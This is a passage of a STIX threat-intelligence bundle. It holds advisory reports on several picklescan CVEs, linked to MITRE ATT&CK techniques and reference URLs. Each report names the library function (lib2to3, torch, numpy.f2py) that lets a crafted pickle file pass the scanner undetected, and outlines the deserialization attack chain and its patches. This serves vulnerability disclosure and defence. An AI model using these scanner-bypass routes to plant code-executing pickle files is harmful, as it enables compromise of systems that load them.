      "published": "2026-07-04T02:24:27Z",
      "labels": [
        "deserialization",
        "rce",
        "vulnerability",
        "python"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71360"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9xph-j2h6-g47v"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-undetected-idlelib-calltip-get-entity"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53762a5d-c8eb-539d-9eda-c0747f559866",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96fc4d17-67e0-546f-81f6-0053f33e087e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c0946c9-5bd6-539e-ad70-f94cc362f350",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--96fc4d17-67e0-546f-81f6-0053f33e087e",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--96fc4d17-67e0-546f-81f6-0053f33e087e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71359: Picklescan Deserialization RCE Bypass",
      "description": "## Overview\n\nThis brief addresses CVE-2025-71359, a high-severity vulnerability impacting `picklescan` versions before 0.0.29. The `picklescan` library, designed to detect malicious Python pickle payloads, fails to identify specific evasion techniques. Specifically, attackers can craft pickle files that embed dangerous code by leveraging `lib2to3.pgen2.grammar.Grammar.loads` within the `__reduce__` method. These specially crafted payloads bypass `picklescan`'s scrutiny. When an application subsequently deserializes such an untrusted pickle file using Python's `pickle.load()`, the embedded malicious code executes on the host system. This remote code execution (RCE) can grant attackers significant control over the compromised environment, allowing for data exfiltration, system modification, or further network penetration. The vulnerability highlights the inherent risks of deserializing untrusted data and the need for robust validation mechanisms.\n\n## Attack Chain\n\n1.  **Craft Malicious Pickle Payload**: An attacker crafts a Python pickle file (`.pkl`) embedding arbitrary code, specifically utilizing `lib2to3.pgen2.grammar.Grammar.loads` within the `__reduce__` method to achieve RCE.\n2.  **Evade Security Scanner**: The crafted malicious payload is designed to exploit the flaw in `picklescan` versions prior to 0.0.29, allowing it to bypass its detection mechanisms.\n3.  **Delivery of Malicious File**: The attacker delivers the malicious pickle file to a target system. This could occur via various vectors, such as uploading to a vulnerable web application, attaching it to a phishing email, or injecting it into a compromised software supply chain.\n4.  **Target Application Processes Pickle File**: A vulnerable application on the target system receives and attempts to deserialize the seemingly benign (undetected by `picklescan`) malicious pickle file using Python's `pickle.load()` function.\n5.  **Deserialization and Code Execution**: During the deserialization process, the `__reduce__` method within the pickle object is invoked, and the embedded `Grammar.loads` executes the attacker's arbitrary code.\n6.  **Remote Code Execution (RCE)**: The attacker's code runs with the privileges of the vulnerable application, leading to remote code execution on the target system.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71359 results in remote code execution (RCE) on the host system where the vulnerable `picklescan` library is used to validate and subsequently deserialize malicious pickle files. This level of access allows attackers to take complete control of the affected application and potentially the underlying server. Consequences can include unauthorized data access, modification, or deletion, installation of malware (e.g., ransomware, backdoors), lateral movement within the network, and complete system compromise. The severity of the impact depends on the privileges of the compromised application and the data it processes.\n\n## Recommendation\n\n*   Immediately update `picklescan` to version 0.0.29 or newer to remediate CVE-2025-71359.\n*   Implement strict input validation and sanitization for all incoming pickle files, regardless of `picklescan` usage.\n*   Adopt secure deserialization practices by never deserializing untrusted data. If deserialization is unavoidable, implement restricted unpickling environments, such as those that limit available classes and functions during `pickle.load()`.\n",
      "published": "2026-07-04T02:23:45Z",
      "labels": [
        "remote-code-execution",
        "deserialization",
        "python",
        "vulnerability",
        "supply-chain"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71359"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f54q-57x4-jg88"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-unsafe-deserialization-via-lib2to3-pgen2-grammar-grammar-loads"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af4df1da-1bb2-5bc7-ac0e-b1a0b95a5ca6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--758922bc-0943-5c09-9c26-2d52a4e4ae1b",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--758922bc-0943-5c09-9c26-2d52a4e4ae1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71356: picklescan Deserialization Vulnerability Leads to RCE",
      "description": "## Overview\n\nCVE-2025-71356 describes a critical deserialization vulnerability impacting `picklescan` versions before 0.0.28. This vulnerability arises because the library fails to properly detect malicious `torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression` function calls embedded within Python pickle files. Attackers can leverage this flaw to craft specially designed pickle files that, when loaded by a victim's application utilizing `picklescan`, execute arbitrary code. The issue allows for pre-payload code execution without detection, bypassing the intended security scanning capabilities of `picklescan`. This could allow threat actors to deliver malware, establish persistence, or exfiltrate data through seemingly benign data files, posing a significant risk to machine learning and data science environments that frequently exchange `pickle` files.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Python `pickle` file containing a specially constructed `torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression` call that includes arbitrary code.\n2.  The attacker delivers this malicious `pickle` file to a target system, potentially via email, compromised data repositories, or untrusted downloads.\n3.  A Python application on the victim's system attempts to load or process the `pickle` file.\n4.  If the `picklescan` library is used to scan the file for malicious content, it fails to detect the embedded arbitrary code within the `torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression` call.\n5.  During the standard Python `pickle` deserialization process, the vulnerable `evaluate_guards_expression` call is executed.\n6.  The embedded arbitrary code payload is then executed on the victim's system, leading to remote code execution, granting the attacker control over the compromised system.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71356 can lead to complete system compromise through remote code execution. Victims, particularly those in data science, machine learning, and AI sectors that frequently handle `pickle` files from various sources, are at risk. Attackers could exploit this to deploy ransomware, establish backdoors, steal sensitive intellectual property, or use the compromised system as a pivot point for further network penetration. The undetected nature of the malicious code within the pickle file bypasses security controls, making this a high-impact vulnerability.\n\n## Recommendation\n\n*   Upgrade `picklescan` to version 0.0.28 or later immediately to mitigate CVE-2025-71356.\n*   Implement strict input validation and source verification for all Python `pickle` files loaded in your environment, especially those originating from untrusted sources, even after upgrading `picklescan`.\n*   Review your software supply chain for components that use or process `pickle` files to identify and update any vulnerable instances of `picklescan`.\n",
      "published": "2026-07-04T02:23:01Z",
      "labels": [
        "deserialization",
        "python",
        "vulnerability",
        "rce",
        "machine-learning"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71356"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f4x7-rfwp-v3xw"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-torch-fx-experimental-symbolic-shapes-shapeenv-evaluate-guards-expression"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41d4de96-ecc8-54a7-ac21-4013bd4415e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mmaitre314/picklescan/security/advisories/GHSA-86cj-95qr-2p4f",
      "pattern": "[url:value = 'https://github.com/mmaitre314/picklescan/security/advisories/GHSA-86cj-95qr-2p4f']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:22:16Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11ff76dd-5be4-51de-8cf8-5590e6402edb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44a5f106-e659-5e37-9778-21fc31b0743b",
      "target_ref": "indicator--41d4de96-ecc8-54a7-ac21-4013bd4415e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a8489f35-2144-5689-880a-6cd10b407124",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-torch-dynamo-guards-guardbuilder-get",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-torch-dynamo-guards-guardbuilder-get']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:22:16Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3d0899de-3861-57b5-8ef8-a1605affdc92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44a5f106-e659-5e37-9778-21fc31b0743b",
      "target_ref": "indicator--a8489f35-2144-5689-880a-6cd10b407124"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--20db983f-68e8-5391-bd58-f4d9595a2c60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--44a5f106-e659-5e37-9778-21fc31b0743b",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--44a5f106-e659-5e37-9778-21fc31b0743b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71353: Picklescan Deserialization Vulnerability Leads to Remote Code Execution",
      "description": "## Overview\n\nCVE-2025-71353 details a critical deserialization vulnerability affecting `picklescan` versions prior to 0.0.28. `picklescan` is a tool designed to identify and mitigate malicious Python pickle files. However, this vulnerability allows attackers to craft specially designed pickle files that leverage the `torch._dynamo.guards.GuardBuilder.get` function within Python's `reduce` methods. These crafted files contain embedded arbitrary commands that `picklescan` fails to detect. Consequently, if such a file is subsequently loaded by an application, the malicious code can execute on the victim's system, leading to remote code execution (RCE). This vulnerability poses a significant risk to systems that process untrusted pickle files, as the security scanner intended to protect them can be bypassed.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious pickle file:** An attacker generates a Python pickle file containing serialized data that, when deserialized, exploits the `torch._dynamo.guards.GuardBuilder.get` function in its `reduce` methods to embed arbitrary commands.\n2.  **Distribution of malicious pickle file:** The attacker distributes this malicious pickle file to a victim, potentially via email attachments, compromised package repositories, or direct downloads.\n3.  **Victim scans file with `picklescan`:** The victim system, or an application interacting with the file, uses `picklescan` (version prior to 0.0.28) to scan the received pickle file for malicious content.\n4.  **`picklescan` fails detection:** Due to the flaw described in CVE-2025-71353, `picklescan` fails to identify the embedded malicious payload within the specially crafted pickle file, deeming it safe.\n5.  **Malicious pickle file is loaded:** An application on the victim's system, trusting the scan results or lacking further validation, proceeds to load and deserialize the now \"clean\" malicious pickle file.\n6.  **Arbitrary Command Execution:** During the deserialization process, the embedded arbitrary commands are executed in the context of the vulnerable application, leading to remote code execution on the victim's system.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71353 leads to remote code execution (RCE) on the compromised system. This grants attackers the ability to execute arbitrary commands, potentially leading to full system compromise, data theft, data alteration, or the deployment of further malware. The vulnerability has a CVSS v3.1 base score of 8.1 (High), reflecting high impacts on confidentiality and integrity, as attackers can bypass an intended security control to achieve their objectives. All applications and users relying on `picklescan` for validating Python pickle files are at risk if running affected versions.\n\n## Recommendation\n\n*   Upgrade `picklescan` to version 0.0.28 or later immediately to remediate CVE-2025-71353.\n*   Review and update any systems or applications that use `picklescan` to scan incoming pickle files to ensure they are using the patched version.\n*   Implement strong input validation and integrity checks for all deserialized data, especially from untrusted sources, even after scanning.\n",
      "published": "2026-07-04T02:22:16Z",
      "labels": [
        "deserialization",
        "rce",
        "python",
        "vulnerability",
        "CVE-2025-71353"
      ],
      "object_refs": [
        "indicator--41d4de96-ecc8-54a7-ac21-4013bd4415e9",
        "indicator--a8489f35-2144-5689-880a-6cd10b407124",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71353"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-86cj-95qr-2p4f"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-torch-dynamo-guards-guardbuilder-get"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1a9a7c8f-48f6-5b0e-be7e-4545edfcbf31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cffc-mxrf-mhh4",
      "pattern": "[url:value = 'https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cffc-mxrf-mhh4']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:21:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13e7de11-713f-5c0a-a8f0-1deb58b7d1d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48334eca-2074-5866-a5c9-e5f3ad0c5f55",
      "target_ref": "indicator--1a9a7c8f-48f6-5b0e-be7e-4545edfcbf31"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b4ba1f84-038a-53c3-a530-07d6269c0502",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/picklescan-undetected-remote-code-execution-via-numpy-f2py-crackfortran-param-eval",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/picklescan-undetected-remote-code-execution-via-numpy-f2py-crackfortran-param-eval']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T02:21:21Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5102b120-255a-5ee2-b281-1788cfca2a46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48334eca-2074-5866-a5c9-e5f3ad0c5f55",
      "target_ref": "indicator--b4ba1f84-038a-53c3-a530-07d6269c0502"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40ce1c9c-fc4a-5a13-93d5-4a1a7ea1a599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48334eca-2074-5866-a5c9-e5f3ad0c5f55",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eb91cf40-5ec3-5f57-ae3c-1604bc627ded",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48334eca-2074-5866-a5c9-e5f3ad0c5f55",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--48334eca-2074-5866-a5c9-e5f3ad0c5f55",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71347: Picklescan Bypass Leads to Arbitrary Code Execution via Malicious Pickle Files",
      "description": "## Overview\n\nA critical vulnerability, CVE-2025-71347, has been identified in the `picklescan` library prior to version 0.0.33. This flaw specifically impacts the library's ability to detect malicious pickle files that leverage the `numpy.f2py.crackfortran.param_eval` function within their `reduce` methods during deserialization. Remote attackers can exploit this bypass to embed arbitrary code within seemingly legitimate pickle files. When an application loads and deserializes such an untrusted, malicious pickle file, the embedded code executes, granting the attacker arbitrary code execution capabilities. This vulnerability is significant for organizations that process or scan Python pickle files, as it allows sophisticated bypasses of security tooling, potentially leading to system compromise through a trusted deserialization process. The issue stems from inadequate sanitization or detection logic within `picklescan` when encountering specific NumPy functions, highlighting the persistent risk of deserialization vulnerabilities in Python ecosystems.\n\n## Attack Chain\n\n1.  **Payload Crafting**: An attacker crafts a malicious Python pickle file, embedding a call to `numpy.f2py.crackfortran.param_eval` with attacker-controlled arguments within the pickle's `reduce` method.\n2.  **Delivery**: The attacker delivers the specially crafted malicious pickle file to a target system. This delivery can occur via various means such as email attachments, file downloads, or through compromised data repositories.\n3.  **Defense Bypass**: If the target system uses `picklescan` versions prior to 0.0.33 to inspect the file, the vulnerability (CVE-2025-71347) causes `picklescan` to fail to detect the malicious code embedded via `numpy.f2py.crackfortran.param_eval`.\n4.  **Execution Trigger**: A vulnerable application on the victim's system, designed to process Python pickle data, attempts to load and deserialize the untrusted, now undetected, malicious pickle file.\n5.  **Arbitrary Code Execution**: During the deserialization process, the embedded `numpy.f2py.crackfortran.param_eval` function is invoked by the Python interpreter, leading to the execution of arbitrary code defined by the attacker.\n6.  **Impact**: The attacker gains control over the application's process with the privileges of the running application, potentially allowing for data exfiltration, further system compromise, or persistence.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71347 results in arbitrary code execution, enabling attackers to fully compromise the affected application and potentially the underlying system. This can lead to sensitive data exfiltration, installation of additional malware, privilege escalation, and complete control over the compromised environment. While the NVD advisory does not specify observed victims or targeted sectors, any organization that uses `picklescan` to validate Python pickle files or deserializes untrusted pickle data is at risk of severe impact, including financial loss, operational disruption, and reputational damage.\n\n## Recommendation\n\n*   Upgrade `picklescan` to version 0.0.33 or later immediately to patch CVE-2025-71347.\n*   Implement strict input validation and deserialization policies to prevent applications from loading untrusted pickle files, even if scanned by older `picklescan` versions.\n*   Refer to the advisory links provided in the `references` section for more detailed information about CVE-2025-71347 and mitigation strategies.\n*   Ensure all applications processing pickle data are isolated in sandboxed environments to minimize the blast radius of potential arbitrary code execution.\n",
      "published": "2026-07-04T02:21:21Z",
      "labels": [
        "deserialization",
        "python",
        "arbitrary-code-execution",
        "vulnerability",
        "cve",
        "defense-evasion"
      ],
      "object_refs": [
        "indicator--1a9a7c8f-48f6-5b0e-be7e-4545edfcbf31",
        "indicator--b4ba1f84-038a-53c3-a530-07d6269c0502",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71347"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cffc-mxrf-mhh4"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-undetected-remote-code-execution-via-numpy-f2py-crackfortran-param-eval"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0eb16c56-1fe5-5220-bb7e-7582ef7705a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81a7efe9-5f00-5ed2-b2dd-701134ffc208",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e02795db-66b5-5c62-ae5a-73d31883c617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--81a7efe9-5f00-5ed2-b2dd-701134ffc208",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--81a7efe9-5f00-5ed2-b2dd-701134ffc208",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71345: Picklescan Malicious Pickle File Detection Bypass Leading to RCE",
      "description": "## Overview\n\nCVE-2025-71345 identifies a significant vulnerability affecting `picklescan` versions released before 0.0.30. This flaw enables threat actors to craft malicious pickle files containing embedded code that `picklescan` fails to detect, specifically when the code leverages the `torch.utils.bottleneck.__main__.run_autograd_prof` function. By exploiting this oversight, attackers can bypass the intended security scanning mechanisms of `picklescan` and achieve remote code execution (RCE) on systems that deserialize these specially crafted files. This vulnerability presents a high risk as it allows for undetectable arbitrary code execution, undermining the integrity and security of applications relying on `picklescan` for safe deserialization of Python objects, particularly in machine learning environments where pickle files are commonly used for model persistence.\n\n## Attack Chain\n\nThe provided source describes a vulnerability in `picklescan`'s detection capabilities rather than a multi-stage attack chain in the wild. The exploitation scenario primarily involves the delivery and deserialization of a specially crafted malicious file. Therefore, a multi-step attack chain as observed in active campaigns cannot be accurately constructed from this information.\n\nHowever, the core exploitation flow is as follows:\n\n1.  **Initial Access**: An attacker delivers a malicious pickle file to a victim system (e.g., via email, download from an untrusted source, or compromised data pipeline).\n2.  **Defense Evasion (Bypass `picklescan`)**: The malicious pickle file is crafted to invoke the `torch.utils.bottleneck.__main__.run_autograd_prof` function, which `picklescan` versions \u003c 0.0.30 fail to identify as malicious.\n3.  **Deserialization**: The victim application or system attempts to load and deserialize the seemingly benign pickle file, potentially after a failed `picklescan` check.\n4.  **Arbitrary Code Execution**: During the deserialization process, the embedded malicious code within the pickle file is executed in the context of the application.\n5.  **Impact**: The executed code performs actions determined by the attacker, such as system compromise, data exfiltration, or further malware deployment.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71345 results in unauthenticated remote code execution on systems that process untrusted pickle files with vulnerable versions of `picklescan`. This allows attackers to bypass security measures, gain full control over the affected system, steal sensitive data, deploy ransomware, or establish persistence within the network. The vulnerability has a CVSS v3.1 base score of 8.1 (High), underscoring the severe consequences of exploitation, particularly in environments handling machine learning models or other serialized Python objects where `picklescan` is deployed for security scanning.\n\n## Recommendation\n\n*   **Patch CVE-2025-71345 immediately**: Update `picklescan` to version 0.0.30 or newer to mitigate the vulnerability and ensure proper detection of malicious pickle files.\n*   **Implement Secure Deserialization Practices**: Restrict the deserialization of pickle files from untrusted or unverified sources, as described by CWE-502.\n*   **Educate Users**: Train users and developers about the risks associated with handling untrusted serialized data, including pickle files.\n",
      "published": "2026-07-04T02:20:22Z",
      "labels": [
        "remote-code-execution",
        "deserialization",
        "python",
        "machine-learning",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71345"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4whj-rm5r-c2v8"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-torch-utils-bottleneck-main-run-autograd-prof"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7cc667e1-47a1-537d-8d99-8f0356dfe04d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3740da46-a5d1-574c-ba3e-dfd2d625eebc",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f86f0b4a-f359-5430-b6bb-5191e642c5f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3740da46-a5d1-574c-ba3e-dfd2d625eebc",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3740da46-a5d1-574c-ba3e-dfd2d625eebc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71343 — picklescan Detection Bypass via Malicious Pickle Files",
